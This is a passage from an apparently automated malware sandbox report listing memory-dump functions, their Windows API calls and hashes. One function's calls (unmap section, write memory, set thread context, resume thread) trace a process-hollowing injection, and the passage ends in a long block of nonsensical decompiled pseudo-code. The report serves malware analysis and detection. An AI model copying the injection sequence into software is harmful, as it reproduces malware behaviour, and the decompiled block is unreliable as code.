                                                                                                                                                  • NtTerminateProcess.NTDLL(?,00000000), ref: 002F1DB7
                                                                                                                                                  • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 002F1DC2
                                                                                                                                                  • NtWriteVirtualMemory.NTDLL(?,?,?,00000004,?), ref: 002F1E36
                                                                                                                                                  • NtSetContextThread.NTDLL(?,00010007), ref: 002F1E74
                                                                                                                                                  • NtResumeThread.NTDLL(?,00000000), ref: 002F1E86
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2190144201.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Section$ProcessView$CreateMemoryThreadVirtual$ContextInformationQueryReadResumeTerminateUnmapWrite
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2175245719-0
                                                                                                                                                  • Opcode ID: 96ae76fc365d5c28d7c28a07cf9a8eaef0a1b5bf8692d1917c9822d9dabbaf16
                                                                                                                                                  • Instruction ID: fb409e544832f2f067109e6d230e9ffb6e78f4c6ff86466e67fb87d1f6fc6bc1
                                                                                                                                                  • Opcode Fuzzy Hash: 96ae76fc365d5c28d7c28a07cf9a8eaef0a1b5bf8692d1917c9822d9dabbaf16
                                                                                                                                                  • Instruction Fuzzy Hash: 0091E47190024DEBDF209FA5CC88EEEBBB8FF49745F404065FA09EA150D731AA64DB60
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 002F00AD, Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 92nativeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • NtOpenSection.NTDLL(?,0000000C,?), ref: 002F0199
                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000001,00000000,00000002), ref: 002F01B8
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2190144201.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Section$OpenView
                                                                                                                                                  • String ID: @$NtMapViewOfSectionNtOpenSection$NtOpenSection$en$wcsl
                                                                                                                                                  • API String ID: 2380476227-2634024955
                                                                                                                                                  • Opcode ID: ca8d08bbda82312d277e41b8cb719b15daffc38e68cad09b1ab1bebb54b543c8
                                                                                                                                                  • Instruction ID: 550a7c49e00088eb1fc8fb14732f44a01b144fbc652baeefe6c1fd42a4bf0014
                                                                                                                                                  • Opcode Fuzzy Hash: ca8d08bbda82312d277e41b8cb719b15daffc38e68cad09b1ab1bebb54b543c8
                                                                                                                                                  • Instruction Fuzzy Hash: 9C3116B1D1025CABCB10CFD4C881AEEBBB8FF08750F10416AE614EB251E7749A05CBA0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 001D1079, Relevance: 1.5, APIs: 1, Instructions: 239memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 001D1300
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2190034457.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                  • Opcode ID: e71c1b11c372e00bb593f7f5bdefeb3b388b183bc4b8d7fb264f9253e8912710
                                                                                                                                                  • Instruction ID: d2b245157bea3e0e6648961802ffa79d697d0dcb7c17a773c08691c1a7066da3
                                                                                                                                                  • Opcode Fuzzy Hash: e71c1b11c372e00bb593f7f5bdefeb3b388b183bc4b8d7fb264f9253e8912710
                                                                                                                                                  • Instruction Fuzzy Hash: D081E030B04244AFCB14DBB4C894AAEBBF6AF89314F24856AD559DB391CB35DC41CB91
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 001D1298, Relevance: 1.3, APIs: 1, Instructions: 50memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 001D1300
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2190034457.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                  • Opcode ID: cfcc157b3fb62ba5f92aa82cbf719d4246af6a0a57715883d1dfe066dd3b395b
                                                                                                                                                  • Instruction ID: bd0f8115965e222a223dbba9b085c2a4caf43ff20e79ed57cf17e4778597f5f1
                                                                                                                                                  • Opcode Fuzzy Hash: cfcc157b3fb62ba5f92aa82cbf719d4246af6a0a57715883d1dfe066dd3b395b
                                                                                                                                                  • Instruction Fuzzy Hash: 9C11C3B59046089FCB10CF9AD844BDEFBF8AB49324F24881AE558A7610C775A944CBA1
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 0013D0EC, Relevance: .1, Instructions: 72COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2190008885.000000000013D000.00000040.00000001.sdmp, Offset: 0013D000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: c039b0454e892438f4b2f7c46338304c2dcba94a49978f32cf3995e5629ce020
                                                                                                                                                  • Instruction ID: 41e9330409201de1620b0814fa349940dbfed17dcb5ca57804d967cbcc036d9c
                                                                                                                                                  • Opcode Fuzzy Hash: c039b0454e892438f4b2f7c46338304c2dcba94a49978f32cf3995e5629ce020
                                                                                                                                                  • Instruction Fuzzy Hash: D421D4B5644204EFDB15DF54F884B26BBA5FB84324F24C96DE8094B246C736D846CBA1
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 0013D0E7, Relevance: .1, Instructions: 53COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2190008885.000000000013D000.00000040.00000001.sdmp, Offset: 0013D000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 5d235fd327546c59c09e40817afc77c429467fd1b8d88e91b989992819d98329
                                                                                                                                                  • Instruction ID: 7da433f35682e41eb28d1c34f278f5fd2c0a498752498686cc1c54b1a9e83c43
                                                                                                                                                  • Opcode Fuzzy Hash: 5d235fd327546c59c09e40817afc77c429467fd1b8d88e91b989992819d98329
                                                                                                                                                  • Instruction Fuzzy Hash: 36119D75504280DFDB15CF10E9C4B15BFB1FB84314F24C6AED8094B656C33AD84ACBA2
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 0012D041, Relevance: .0, Instructions: 45COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2189999088.000000000012D000.00000040.00000001.sdmp, Offset: 0012D000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 0dad5559660870d38f84a8cc9a78255547a07c008cffb85d6f99136b1abee523
                                                                                                                                                  • Instruction ID: 8b33be2f4dd9cc4a41189eb2044c9771bebf9f7ad5c0d421a8d105bbb4756034
                                                                                                                                                  • Opcode Fuzzy Hash: 0dad5559660870d38f84a8cc9a78255547a07c008cffb85d6f99136b1abee523
                                                                                                                                                  • Instruction Fuzzy Hash: 9701F771008354DAEB204A65F884BA7FB9CEF51724F28851AFD450F292D334DC41C7B6
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 0012D040, Relevance: .0, Instructions: 36COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2189999088.000000000012D000.00000040.00000001.sdmp, Offset: 0012D000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 576dbe65269da44885242b29b4a1caf171a8674b4c49834ca5b60bf65edf8821
                                                                                                                                                  • Instruction ID: d656c5092ecb0a4b3285f6b3d513e50fa3a96ee74c7733035ae703a14c74d40f
                                                                                                                                                  • Opcode Fuzzy Hash: 576dbe65269da44885242b29b4a1caf171a8674b4c49834ca5b60bf65edf8821
                                                                                                                                                  • Instruction Fuzzy Hash: 28F0C2710082409EEB108A15EC88BA2FF98EF91724F18C45AED081F282C3799C40CBB1
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Non-executed Functions

                                                                                                                                                  Function 0106AAA2, Relevance: .5, Instructions: 548COMMONCrypto
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 83%
                                                                                                                                                  			E0106AAA2(signed int __eax, signed int __ebx, signed int __ecx, signed int __edx, signed int __edi, signed int __esi) {
				signed int _t273;
				signed int _t274;
				signed int _t276;
				signed int _t277;
				signed int _t278;
				signed int _t279;
				signed int _t284;
				signed int _t286;
				signed int _t288;
				intOrPtr* _t289;
				signed int _t291;
				signed char _t294;
				signed int _t295;
				signed int _t296;
				signed char _t297;
				signed int* _t301;
				signed int _t302;
				signed char _t303;
				signed int _t304;
				intOrPtr* _t305;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed char _t318;
				signed char _t319;
				signed char _t322;
				signed char _t323;
				signed char _t324;
				signed char _t325;
				signed char _t326;
				signed char _t327;
				signed char _t328;
				signed char _t329;
				signed char _t330;
				signed int* _t331;
				signed char _t332;
				signed int* _t333;
				signed char _t334;
				signed char _t335;
				signed char _t336;
				signed char _t337;
				signed char _t338;
				signed char _t340;
				signed char _t341;
				signed char _t342;
				signed int _t343;
				signed int _t344;
				signed int* _t345;
				signed int _t347;
				intOrPtr* _t349;
				intOrPtr* _t351;
				char* _t352;
				intOrPtr* _t353;
				signed int _t354;
				void* _t356;
				signed char _t361;
				signed int _t362;
				signed char _t364;
				intOrPtr* _t365;
				void* _t366;
				signed int _t367;
				void* _t368;
				void* _t372;
				intOrPtr* _t373;
				signed int _t377;
				void* _t378;
				void* _t380;
				signed int* _t381;
				signed int _t383;
				void* _t384;
				intOrPtr* _t385;
				signed int _t389;
				signed int _t391;
				intOrPtr* _t392;
				signed char _t394;
				signed char _t396;
				signed int _t397;
				signed int* _t398;
				signed int* _t401;
				signed char _t407;
				signed char _t410;
				signed int* _t412;
				void* _t413;
				signed int _t415;
				signed int _t416;

				_t273 = __eax | 0xf6000102;
				 *(__edi + 0x9000100) =  *(__edi + 0x9000100) ^ __ecx;
				_t416 = _t415 ^ __edi;
				asm("sbb al, [ecx]");
				 *__ebx =  *__ebx + __edx;
				 *__ecx =  *__ecx ^ _t273;
				asm("sbb eax, [ecx]");
				 *__edi =  *__edi + __ebx;
				 *0x2f000102 =  *0x2f000102 ^ __ecx;
				 *0x66000102 =  *0x66000102 ^ __ecx;
				_t274 = _t273 | 0x17000102;
				ss = ss;
				_push(ss);
				_t377 = __edx &  *(__edi + 0x4500060d);
				 *(__edi + 0x4e00010d) =  *(__edi + 0x4e00010d) ^ _t377;
				 *(__edi + 0x59000109) =  *(__edi + 0x59000109) ^ __esi;
				_t276 = (_t274 | 0x5b000102) ^ __edi;
				 *__ecx =  *__ecx + _t276;
				_t277 = _t276 + __ebx;
				asm("clc");
				 *__ecx =  *__ecx + _t277;
				 *((intOrPtr*)(_t377 + 0x31)) =  *((intOrPtr*)(_t377 + 0x31)) + __ecx;
				_t278 = _t277 | 0x71000102;
				_t347 = __ebx ^ __edi;
				asm("adc [ecx], al");
				 *((intOrPtr*)(_t278 + 0x100af31)) =  *((intOrPtr*)(_t278 + 0x100af31)) + _t278;
				 *((intOrPtr*)(_t377 + 0x60d9731)) =  *((intOrPtr*)(_t377 + 0x60d9731)) + __ecx;
				_t412[0x5802bcc] = _t412[0x5802bcc] + _t278;
				_t279 = _t278 + __ecx;
				ss = ss;
				asm("sgdt [es:eax]");
				asm("o16 xor al, 0xaf");
				 *__ecx =  *__ecx + _t279;
				_t412[0xd] = _t412[0xd] + _t347;
				 *__ecx =  *__ecx + ((_t279 | 0x98000102) ^ 0x000000af);
				 *((intOrPtr*)(_t347 + 0x10d9734)) =  *((intOrPtr*)(_t347 + 0x10d9734)) + _t377;
				 *((intOrPtr*)(__ecx + 0x35)) =  *((intOrPtr*)(__ecx + 0x35)) + _t377;
				 *0xd =  *0xd + 0xd;
				_t284 = __edi | 0x35670001;
				asm("scasd");
				 *__esi =  *__esi + 0xd;
				_push(es);
				asm("lahf");
				asm("sbb al, 0x56");
				asm("lahf");
				asm("sbb al, 0x56");
				asm("adc cl, 0x35");
				asm("lahf");
				asm("sbb al, 0x1");
				 *((intOrPtr*)(__esi + 0x34)) =  *((intOrPtr*)(__esi + 0x34)) + _t284;
				asm("scasd");
				 *0x56020d35 =  *0x56020d35 + 0xd;
				_t286 = _t284 + _t284 ^ 0x013300af;
				asm("sahf");
				asm("out 0x1c, eax");
				asm("enter 0x20, 0x0");
				 *_t286 =  *_t286 + 0xd;
				_t391 = _t286;
				 *0x0000002E =  *((intOrPtr*)(0x2e)) + 0x34;
				_push(0x56020d35);
				 *0x56020d35 =  *0x56020d35 + 0xd;
				_t378 = _t377 + _t377;
				 *__esi =  *__esi & 0x0000000d;
				 *__esi =  *__esi + 0xd;
				 *((intOrPtr*)(_t391 + 0x60219d00)) =  *((intOrPtr*)(_t391 + 0x60219d00)) + _t378;
				 *0x34 =  *0x34 + 0xd;
				_t349 = 0x34 + __esi;
				 *__esi =  *__esi & 0x0000000d;
				 *__esi =  *__esi + 0xd;
				 *((intOrPtr*)(_t391 + 0x6821ae00)) =  *((intOrPtr*)(_t391 + 0x6821ae00)) + _t378;
				 *0x20f400 =  *0x20f400 + 0xd;
				 *__esi =  *__esi + 0xd;
				 *((intOrPtr*)(_t391 + 0x6e21df00)) =  *((intOrPtr*)(_t391 + 0x6e21df00)) + _t378;
				 *_t391 =  *_t391 + 0xd;
				_t288 = __esi + _t349;
				 *_t288 =  *_t288 & 0x0000000d;
				 *_t288 =  *_t288 + 0xd;
				 *((intOrPtr*)(_t349 + 0x7621f200)) =  *((intOrPtr*)(_t349 + 0x7621f200)) + _t378;
				 *_t391 =  *_t391 + 0xd;
				 *0x56020d35 =  *0x56020d35 + 0x56020d7f;
				 *_t288 =  *_t288 & _t288;
				 *_t288 =  *_t288 + 0xd;
				 *((intOrPtr*)(_t349 + 0x7b220e00)) =  *((intOrPtr*)(_t349 + 0x7b220e00)) + _t378;
				 *0xd =  *0xd + 0xd;
				 *_t349 =  *_t349 + 0x34;
				 *_t288 =  *_t288 & _t288;
				 *_t288 =  *_t288 + 0xd;
				 *((intOrPtr*)(_t349 + 0x7b221a00)) =  *((intOrPtr*)(_t349 + 0x7b221a00)) + _t378;
				 *0xd =  *0xd + 0xd;
				 *((intOrPtr*)(_t288 + 0x27)) =  *((intOrPtr*)(_t288 + 0x27)) + _t349;
				 *((intOrPtr*)(_t391 - 0x68ddd600)) =  *((intOrPtr*)(_t391 - 0x68ddd600)) + _t378;
				 *0xd =  *0xd + 0xd;
				 *_t391 =  *_t391 + 0x34;
				 *_t288 =  *_t288 & _t288;
				 *_t288 =  *_t288 + 0xd;
				 *((intOrPtr*)(_t391 - 0x6cf1dae8)) =  *((intOrPtr*)(_t391 - 0x6cf1dae8)) + 0xd;
				 *_t288 =  *_t288 + 0x56020d7f;
				 *_t391 =  *_t391 + _t288;
				 *_t288 =  *_t288 & _t288;
				 *_t288 =  *_t288 + 0xd;
				 *0xC424464D =  *((intOrPtr*)(0xc424464d)) + _t378;
				 *_t288 =  *_t288 + 0x56020d7f;
				_t412[8] = _t412[8] + _t378;
				 *_t288 =  *_t288 + 0xd;
				 *_t288 =  *_t288 + 0xd;
				_t289 = _t349;
				 *0x0000002F =  *((intOrPtr*)(0x2f)) + _t378;
				asm("daa");
				 *_t289 =  *_t289 + 0xd;
				 *_t289 =  *_t289 + 0xd;
				_t392 = _t289;
				_t412[8] = _t412[8] + 0x56020d7f;
				asm("in al, 0x0");
				_t291 = _t391 |  *_t391;
				 *((intOrPtr*)(_t392 - 0xadd8800)) =  *((intOrPtr*)(_t392 - 0xadd8800)) + 0xfc000800;
				 *((intOrPtr*)(_t291 + _t291)) =  *((intOrPtr*)(_t291 + _t291)) + 0x56020d7f;
				 *_t291 =  *_t291 & _t291;
				 *_t291 =  *_t291 + 0xd;
				 *0xC4249835 =  *((intOrPtr*)(0xc4249835)) + 0xfc000800;
				 *((intOrPtr*)(_t291 + _t291)) =  *((intOrPtr*)(_t291 + _t291)) + 0x56020d7f;
				 *_t291 =  *_t291 & _t291;
				 *_t291 =  *_t291 + 0xd;
				 *((intOrPtr*)(_t392 + 0x6e229b00)) =  *((intOrPtr*)(_t392 + 0x6e229b00)) + 0xfc000800;
				 *((intOrPtr*)(_t291 + _t291)) =  *((intOrPtr*)(_t291 + _t291)) + 0x56020d7f;
				_t389 = 0x28;
				 *_t291 =  *_t291 & _t291;
				 *_t291 =  *_t291 + 0xd;
				 *0xC424D935 =  *((intOrPtr*)(0xc424d935)) + 0xfc000800;
				 *((intOrPtr*)(_t291 + _t291)) =  *((intOrPtr*)(_t291 + _t291)) + 0x56020d7f;
				_push(ds);
				 *_t291 =  *_t291 & _t291;
				 *_t291 =  *_t291 + 0xd;
				 *((intOrPtr*)(_t392 - 0x6cf1dae8)) =  *((intOrPtr*)(_t392 - 0x6cf1dae8)) + 0xd;
				 *((intOrPtr*)(_t291 + _t291)) =  *((intOrPtr*)(_t291 + _t291)) + 0x56020d7f;
				asm("insd");
				 *_t291 =  *_t291 & _t291;
				 *_t291 =  *_t291 + 0xd;
				 *((intOrPtr*)(0xc424464d)) =  *((intOrPtr*)(0xc424464d)) + 0xfc000800;
				 *((intOrPtr*)(_t291 + _t291)) =  *((intOrPtr*)(_t291 + _t291)) + 0x56020d7f;
				 *_t291 = gs;
				 *_t291 =  *_t291 + 0xd;
				 *_t291 =  *_t291 + 0xd;
				_t294 = _t392 + 0x00000034 &  *_t389;
				 *((intOrPtr*)(_t294 + _t294)) =  *((intOrPtr*)(_t294 + _t294)) + 0x56020d35;
				asm("les ebp, [eax]");
				 *_t294 =  *_t294 + 0xd;
				 *_t294 =  *_t294 + 0xd;
				_t295 = _t291;
				_t394 = _t294;
				_t351 = _t288 + 0xfc000800;
				_t361 = 0x56020d7f &  *0x56020d35;
				 *0x294c00 =  *0x294c00 + 0x56020d35;
				 *_t295 =  *_t295 + 0xd;
				 *((intOrPtr*)(_t394 + 0x67232c00)) =  *((intOrPtr*)(_t394 + 0x67232c00)) + 0xfc000800;
				 *_t394 =  *_t394 + 0x56020d35;
				 *((intOrPtr*)(_t295 + 0x29)) =  *((intOrPtr*)(_t295 + 0x29)) + _t295;
				 *((intOrPtr*)(_t394 - 0x6adc8700)) =  *((intOrPtr*)(_t394 - 0x6adc8700)) + 0xfc000800;
				 *0x56020d35 =  *0x56020d35 + 0xfc000800;
				 *_t295 =  *_t295 + _t295;
				_t296 = _t295 -  *_t295;
				 *_t296 =  *_t296 + 0xd;
				 *((intOrPtr*)(_t394 + 0x29239c00)) =  *((intOrPtr*)(_t394 + 0x29239c00)) + 0xfc000800;
				 *0xfc000800 =  *0xfc000800 + 0xfc000800;
				 *((intOrPtr*)(0xfc000800 + _t412)) =  *((intOrPtr*)(0xfc000800 + _t412)) + _t361;
				 *_t296 =  *_t296 + 0xd;
				 *0x0D25D635 =  *((intOrPtr*)(0xd25d635)) + 0xfc000800;
				 *_t351 =  *_t351 + 0xfc000800;
				 *_t394 =  *_t394 + 0x34;
				 *_t296 =  *_t296 & _t296;
				 *_t296 =  *_t296 + 0xd;
				 *((intOrPtr*)(_t394 - 0x6cf1dae8)) =  *((intOrPtr*)(_t394 - 0x6cf1dae8)) + 0xd;
				 *_t394 =  *_t394 + 0xfc000800;
				 *((intOrPtr*)(0xfc000800 + _t412)) =  *((intOrPtr*)(0xfc000800 + _t412)) + _t296;
				_t297 = _t394;
				_t412[0x580ac09] = _t412[0x580ac09] + 0xfc000800;
				 *((intOrPtr*)(_t297 + 0x2b)) =  *((intOrPtr*)(_t297 + 0x2b)) + _t351;
				 *_t297 =  *_t297 + 0xd;
				 *_t297 =  *_t297 + 0xd;
				_t396 = _t297;
				 *((intOrPtr*)(_t351 + 0x10)) =  *((intOrPtr*)(_t351 + 0x10)) + _t361;
				 *0xfc000800 =  *0xfc000800 + 1;
				asm("sbb [eax], al");
				L2();
				 *((intOrPtr*)(_t396 + 0x52106b00)) =  *((intOrPtr*)(_t396 + 0x52106b00)) + 0xfc000800;
				_t352 = _t351 +  *0xfc000800;
				 *((intOrPtr*)(_t412 + _t416)) =  *((intOrPtr*)(_t412 + _t416)) + _t361;
				_t397 = _t296;
				 *((intOrPtr*)(_t352 + 0x10)) =  *((intOrPtr*)(_t352 + 0x10)) + _t361;
				 *_t352 =  *_t352 + 0x1c;
				_t301 = _t396 + _t396;
				 *_t301 =  *_t301 + 0xd;
				 *((intOrPtr*)(_t397 - 0x35db5300)) =  *((intOrPtr*)(_t397 - 0x35db5300)) + 0xfc000800;
				_t353 = _t352 +  *0x2d7800;
				 *_t301 =  *_t301 + 0xd;
				 *((intOrPtr*)(_t397 + 0x40f8300)) =  *((intOrPtr*)(_t397 + 0x40f8300)) + 0xfc000800;
				_t302 = _t397;
				_t398 = _t301;
				 *((intOrPtr*)(_t353 + 0x1f04040f)) =  *((intOrPtr*)(_t353 + 0x1f04040f)) + 0xd;
				 *_t302 =  *_t302 + 0xd;
				 *[cs:eax] =  *[cs:eax] + 0xd;
				 *_t302 =  *_t302 + 0xd;
				_t303 = _t361;
				_t362 = _t302;
				_t398[0x8011249] = _t398[0x8011249] + _t353;
				 *((intOrPtr*)(_t303 + 0x2e)) =  *((intOrPtr*)(_t303 + 0x2e)) + _t362;
				 *((intOrPtr*)(_t362 - 0x37db2b00)) =  *((intOrPtr*)(_t362 - 0x37db2b00)) + 0xfc000800;
				_t304 = _t303 + 0x22;
				 *_t398 =  *_t398 + 0x34;
				 *_t304 =  *_t304 & _t304;
				 *_t304 =  *_t304 + 0xd;
				 *((intOrPtr*)(_t398 - 0x6cf1dae8)) =  *((intOrPtr*)(_t398 - 0x6cf1dae8)) + 0xd;
				 *0x315000 =  *0x315000 + _t304;
				 *_t304 =  *_t304 + 0xd;
				 *((intOrPtr*)(_t353 - 0x66f07600)) =  *((intOrPtr*)(_t353 - 0x66f07600)) + 0xd;
				_t305 = _t304 +  *0x211e00;
				 *_t305 =  *_t305 + 0xd;
				 *((intOrPtr*)(_t398 - 0x6cf1dae8)) =  *((intOrPtr*)(_t398 - 0x6cf1dae8)) + 0xd;
				 *_t398 =  *_t398 + _t305;
				 *((intOrPtr*)(_t362 + 0x21)) =  *((intOrPtr*)(_t362 + 0x21)) + _t353;
				 *_t305 =  *_t305 + 0xd;
				 *_t305 =  *_t305 + 0xd;
				 *_t305 =  *_t305 + 0xffffff97;
				asm("adc [esp+eax], bh");
				 *[es:edi+0x21] =  *[es:edi+0x21] + 0xd;
				 *((intOrPtr*)(_t353 + 0x1110ad00)) =  *((intOrPtr*)(_t353 + 0x1110ad00)) + 0xd;
				_t306 = _t305 + 0x21aa0027;
				 *_t306 =  *_t306 + 0xd;
				 *_t306 =  *_t306 + 0xd;
				_t307 = _t362;
				asm("sbb [ecx], bh");
				_t364 = _t306 &  *_t398;
				 *_t307 =  *_t307 - 0xd;
				_push(ds);
				 *_t307 =  *_t307 & _t307;
				 *_t307 =  *_t307 + 0xd;
				 *((intOrPtr*)(_t398 - 0x6cf1dae8)) =  *((intOrPtr*)(_t398 - 0x6cf1dae8)) + 0xd;
				 *_t307 =  *_t307 + _t364;
				_t398[8] = _t398[8] + 0xfc000800;
				 *((intOrPtr*)(_t353 + 0x4e0f6400)) =  *((intOrPtr*)(_t353 + 0x4e0f6400)) + 0xd;
				_t365 = _t364 +  *_t307;
				 *_t398 =  *_t398 + 0x34;
				 *_t307 =  *_t307 & _t307;
				 *_t307 =  *_t307 + 0xd;
				 *((intOrPtr*)(_t398 - 0x6cf1dae8)) =  *((intOrPtr*)(_t398 - 0x6cf1dae8)) + 0xd;
				 *_t365 =  *_t365 + _t365;
				 *((intOrPtr*)(_t307 + 0x32)) =  *((intOrPtr*)(_t307 + 0x32)) + _t365;
				 *_t307 =  *_t307 + 0xd;
				 *_t307 =  *_t307 + 0xd;
				 *_t307 =  *_t307 + 0x3d;
				_t308 = _t307 & 0x0029056a;
				_push(ds);
				 *_t308 =  *_t308 & _t308;
				 *_t308 =  *_t308 + 0xd;
				 *((intOrPtr*)(_t398 - 0x6cf1dae8)) =  *((intOrPtr*)(_t398 - 0x6cf1dae8)) + 0xd;
				 *0xfc000800 =  *0xfc000800 + _t365;
				_t398[8] = _t398[8] + _t353;
				 *((intOrPtr*)(_t353 + 0x3c256100)) =  *((intOrPtr*)(_t353 + 0x3c256100)) + 0xd;
				_t310 = _t308 + 0xfffffffffc00082a;
				 *_t310 =  *_t310 & _t310;
				 *_t310 =  *_t310 + 0xd;
				 *((intOrPtr*)(_t353 - 0x66da9000)) =  *((intOrPtr*)(_t353 - 0x66da9000)) + 0xd;
				_t366 = _t365 +  *_t353;
				 *((intOrPtr*)(0xfc000800 + _t398)) =  *((intOrPtr*)(0xfc000800 + _t398)) + _t366;
				 *_t310 =  *_t310 + 0xffffff84;
				_t311 = _t310 & 0x002c057f;
				_push(ds);
				 *_t311 =  *_t311 & _t311;
				 *_t311 =  *_t311 + 0xd;
				 *((intOrPtr*)(_t398 - 0x6cf1dae8)) =  *((intOrPtr*)(_t398 - 0x6cf1dae8)) + 0xd;
				 *0x21e700 =  *0x21e700 + _t366;
				 *_t311 =  *_t311 + 0xd;
				 *((intOrPtr*)(_t353 + 0x3c25af00)) =  *((intOrPtr*)(_t353 + 0x3c25af00)) + 0xd;
				_t312 = _t311 + 0x2d;
				_t380 = 0xfc000800 + _t353;
				 *_t312 =  *_t312 & _t312;
				 *_t312 =  *_t312 + 0xd;
				 *((intOrPtr*)(_t366 + 0x6e223918)) =  *((intOrPtr*)(_t366 + 0x6e223918)) + _t380;
				 *_t398 =  *_t398 + _t366;
				 *_t398 =  *_t398 + 0x34;
				 *_t312 =  *_t312 & _t312;
				 *_t312 =  *_t312 + 0xd;
				 *((intOrPtr*)(_t398 - 0x6cf1dae8)) =  *((intOrPtr*)(_t398 - 0x6cf1dae8)) + 0xd;
				 *_t398 =  *_t398 + _t366;
				_t398[8] = _t398[8] + _t380;
				 *((intOrPtr*)(_t353 + 0x4e25cb00)) =  *((intOrPtr*)(_t353 + 0x4e25cb00)) + 0xd;
				_t367 = _t366 +  *_t398;
				 *((intOrPtr*)(_t353 + _t398)) =  *((intOrPtr*)(_t353 + _t398)) + _t312;
				 *_t312 =  *_t312 + 0xd;
				 *_t312 =  *_t312 + 0xd;
				_t354 = _t353 + _t367;
				 *0x33 =  *0x33 + 0xd;
				 *0x33 =  *0x33 + 0xd;
				 *_t389 =  *_t389 + 0xd;
				_t381 = _t380 - 1;
				_push(es);
				_push(es);
				_t318 = (_t312 ^  *_t312) &  *(_t312 ^  *_t312);
				 *_t318 =  *_t318 + 0xd;
				 *((intOrPtr*)(_t367 + 0x6e223918)) =  *((intOrPtr*)(_t367 + 0x6e223918)) + _t381;
				 *_t389 = _t381 +  *_t389;
				 *0x33 =  *0x33 + 0x34;
				 *_t318 =  *_t318 & _t318;
				 *_t318 =  *_t318 + 0xd;
				 *0xFFFFFFFF930E254B =  *((intOrPtr*)(0xffffffff930e254b)) + 0xd;
				 *_t389 = _t381 +  *_t389;
				 *0xfc000800 =  *0xfc000800 + _t381;
				_t319 = _t318 &  *_t318;
				 *_t319 =  *_t319 + 0xd;
				 *((intOrPtr*)(_t354 - 0x7cd9cc00)) =  *((intOrPtr*)(_t354 - 0x7cd9cc00)) + 0xd;
				_push(es);
				asm("aaa");
				 *((intOrPtr*)(0x33 + _t416)) =  *((intOrPtr*)(0x33 + _t416)) + _t367;
				 *_t319 =  *_t319 + 0xd;
				 *_t319 =  *_t319 + 0xd;
				_t320 = 0x33;
				_t401 = _t319;
				 *0x00000059 =  *((intOrPtr*)(0x59)) + _t381;
				asm("clc");
				_push(es);
				if( *0x33 >= 0xd) {
					 *0x33 =  *0x33 + 0xd;
					 *0x33 =  *0x33 + 0xd;
					_t345 = _t401;
					_t345[0xec1d489] = 0x33 + _t345[0xec1d489];
					_t345[0xd] = _t345[0xd] + 0x34;
					 *0xFFFFFFFF8026B233 =  *((intOrPtr*)(0xffffffff8026b233)) + _t381;
					 *0x3be000 =  *0x3be000 | _t389;
					 *_t345 =  *_t345 + 0xd;
					 *0x0D26BE33 =  *((intOrPtr*)(0xd26be33)) + _t381;
					_t354 = _t354 |  *0x33;
					 *_t389 =  *_t389 + _t367;
